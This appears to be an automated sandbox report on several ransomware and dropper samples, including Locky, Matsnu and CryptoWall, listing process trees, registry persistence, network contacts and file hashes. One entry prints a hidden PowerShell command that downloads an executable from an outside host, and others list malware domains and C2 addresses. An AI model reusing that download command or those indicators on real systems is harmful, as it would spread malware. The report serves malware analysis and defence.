US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 tcp
US 204.8.99.146:443 tcp
US 204.8.99.146:443 tcp

Files

memory/1988-0-0x000007FEF611E000-0x000007FEF611F000-memory.dmp

memory/1988-1-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-2-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-3-0x0000000002300000-0x0000000002352000-memory.dmp

memory/1988-4-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-10-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-11-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-12-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-13-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-14-0x000007FEF611E000-0x000007FEF611F000-memory.dmp

memory/1988-15-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-16-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

memory/1988-17-0x000007FEF5E60000-0x000007FEF67FD000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240708-en

Max time kernel

121s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 6d27cc95ffdccec8bac01c49908f4735
SHA1 31464f4e0ad519306effb03ec82d492d494596e7
SHA256 500d50c27061fba57363803977911f2070ad5577707b23cfe027a10dc393bcd1
SHA512 586dc4cc241bb35e420be633e2f3e848382d222ee492c0794a0ba685e677cacc93ce4df4288707c0e9b5e37a1d51af985cceb88329b708768aca5c4e770fd0de

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Signatures

Locky

ransomware locky

Locky family

locky

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Locky.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Locky.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 embavssrrfvukl.in udp
US 8.8.8.8:53 rcbquc.ru udp
US 8.8.8.8:53 frxdrjrjd.de udp
US 8.8.8.8:53 weaaspoo.in udp
US 8.8.8.8:53 ktwmpwuncbi.fr udp
US 8.8.8.8:53 cjpqsuatmo.tf udp
IE 86.104.134.144:80 tcp

Files

memory/1620-0-0x0000000000D80000-0x0000000000D84000-memory.dmp

memory/1620-1-0x0000000000D80000-0x0000000000D84000-memory.dmp

memory/1620-2-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-4-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-6-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-8-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-9-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-12-0x0000000000400000-0x00000000007D1000-memory.dmp

memory/1620-13-0x0000000000400000-0x00000000007D1000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20241023-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\131.exe

"C:\Users\Admin\AppData\Local\Temp\131.exe"

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240708-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\tmwbwwjl = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nlsefvhjar\\zdfiqwwjl.exe" C:\Windows\SysWOW64\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 2000 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
PID 1896 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1896 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1896 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1896 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 1896 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe C:\Windows\SysWOW64\svchost.exe
PID 2344 wrote to memory of 2556 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2344 wrote to memory of 2556 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2344 wrote to memory of 2556 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2344 wrote to memory of 2556 N/A C:\Windows\SysWOW64\svchost.exe C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 2556 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre
PID 3032 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Windows\SysWOW64\svchost.exe
PID 3032 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Windows\SysWOW64\svchost.exe
PID 3032 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Windows\SysWOW64\svchost.exe
PID 3032 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Windows\SysWOW64\svchost.exe
PID 3032 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre C:\Windows\SysWOW64\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe

"C:\Users\Admin\AppData\Local\Temp\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre

C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre

C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre

C:\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre

C:\Windows\SysWOW64\svchost.exe

svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 nvufvwieg.com udp

Files

memory/1896-0-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-8-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-11-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-13-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-12-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2344-18-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/1896-16-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2344-15-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2344-14-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/1896-10-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-6-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1896-4-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1896-2-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\mhfrwobcsp.pre

MD5 1b2d2a4b97c7c2727d571bbf9376f54f
SHA1 1fc29938ec5c209ba900247d2919069b320d33b0
SHA256 7634433f8fcf4d13fb46d680802e48eeb160e0f51e228cae058436845976381e
SHA512 506fc96423e5e2e38078806591e09a6eb3cf924eb748af528f7315aa0b929890823798a3ef2a5809c14023c3ff8a3db36277bc90c7b099218422aafa4e0c2ee0

memory/2344-28-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/3032-45-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3032-50-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2960-47-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2960-51-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2960-52-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

memory/2960-57-0x000000007EFA0000-0x000000007EFAE000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

117s

Max time network

117s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\17530.exe');

Network

Country Destination Domain Proto
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp

Files

memory/2644-0-0x0000000003280000-0x00000000032A0000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 103.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cryptowall.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cryptowall.exe

"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1520 -ip 1520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 476

Network

Country Destination Domain Proto
